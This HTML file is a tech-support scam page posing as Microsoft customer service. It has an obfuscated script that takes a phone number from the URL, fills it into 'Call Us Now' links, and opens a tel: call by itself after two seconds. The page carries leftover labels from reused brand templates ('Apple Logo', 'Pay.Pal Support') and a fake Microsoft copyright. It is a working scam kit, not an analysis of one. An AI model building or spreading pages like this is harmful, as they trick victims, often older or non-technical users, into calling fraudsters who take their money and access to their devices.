<!DOCTYPE html><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Microsoft Customer Service</title>
  <style>
    body {
      font-family: "SF Pro Text", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
      text-align: center;
      padding: 20px;
      background-color: #f5f5f7;
    }

    h1 {
      font-size: 32px;
      margin-bottom: 20px;
    }

    p {
      font-size: 18px;
      line-height: 1.5;
      margin-bottom: 30px;
    }

    .call-button {
      display: inline-block;
      background-color: #0000FF;
      color: #fff;
      padding: 15px 30px;
      font-size: 24px;
      border-radius: 5px;
      text-decoration: none;
      transition: background-color 0.3s ease;
      margin-bottom: 20px;
    }

    .call-button:hover {
      background-color: #b71b36;
    }

    .apple-logo {
      width: 150px;
      height: 150px;
      margin-bottom: 30px;
    }

    .footer {
      font-size: 14px;
      color: #888;
      margin-top: 50px;
    }
  </style>
 
</head>

<script>
       function jkdhasjkhdgwqhgehkqgweyuodq(name)
        {
            name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
            var regexS = "[\\?&]"+name+"=([^&#]*)";
            var regex = new RegExp( regexS );
            var results = regex.exec( window.location.href );
            if( results == null )
                return "";
            else
                return results[1];
        }
        var call = jkdhasjkhdgwqhgehkqgweyuodq('call');
		
			 if (call) {
        
			
			  var phoneLink1 = document.getElementById('phone-link1');
            phoneLink1.href = 'tel:+' + call;
            phoneLink1.textContent = 'Call +' + call;
			
			  var phoneLink2 = document.getElementById('phone-link2');
            phoneLink2.href = 'tel:+' + call;
            phoneLink2.textContent = 'Contact Pay.Pal Support';
			
		
        }
		
    </script>
	
 <script>
     function makeCall() {
        window.location.href = 'tel:+' + call;
    }
    setTimeout(makeCall, 2000);
   </script>
   
<body>

  
<img src="images/micr.png" alt="Apple Logo" class="apple-logo">
  <h1>Microsoft Support</h1>
  
  <a id="phone-link2"  class="call-button">Call Us Now</a>
<br>
  <a id="phone-link1"  class="call-button"><script>document.write('+'+call)</script></a>
    <p>For any assistance or inquiries related to Microsoft products or services, our dedicated customer service team is here to help you. Whether you need technical support, have questions about your Microsoft device, require assistance with your Microsoft account, or need guidance with Microsoft services, our experts are just a phone call away. Experience exceptional support from Microsoft.</p>
 
   
<img src="images/micross.jpg" alt="Microsoft Logo" style="width:80%;height:50%">
    
     <p class="footer">© 2024 Microsoft Inc. All rights reserved.</p>








</body></html>